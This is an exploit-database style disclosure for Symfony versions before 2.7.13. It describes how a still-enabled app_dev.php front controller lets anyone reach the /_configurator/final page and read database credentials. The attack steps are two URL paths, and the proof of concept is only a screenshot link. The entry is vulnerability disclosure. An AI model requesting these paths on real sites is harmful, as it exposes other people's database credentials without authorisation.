Symfony versions prior to 2.7.13 suffer from a remote information disclosure vulnerability when app_dev is enabled.
24ccf4690feb930cce80b458f01201c7# Exploit Title: Symfony < 2.7.13 - Remote information Disclosure
# Google Dork: N/A
# Date: 6/27/2018
# Exploit Author: Abdeljalil Nouiri (pwny)
# Author Mail : abdel001nouiri[at]gmail[dot]com
# Vendor Homepage: https://www.symfony.com/
# Version: 2.7.13
# Tested on: Win10 x64, Ubuntu
# Exploit :
-STEP 1:
This Vulnerability Will Work if the "app_dev" isn't disabled
url : https://localhost/app_dev.php/
-STEP 2:
the last step of symfony configuration still accessible , this would leak
all information including ( database host/user/password ... etc)
url :https://localhost/app_dev.php/_configurator/final
# POC :
http://prntscr.com/kbuua8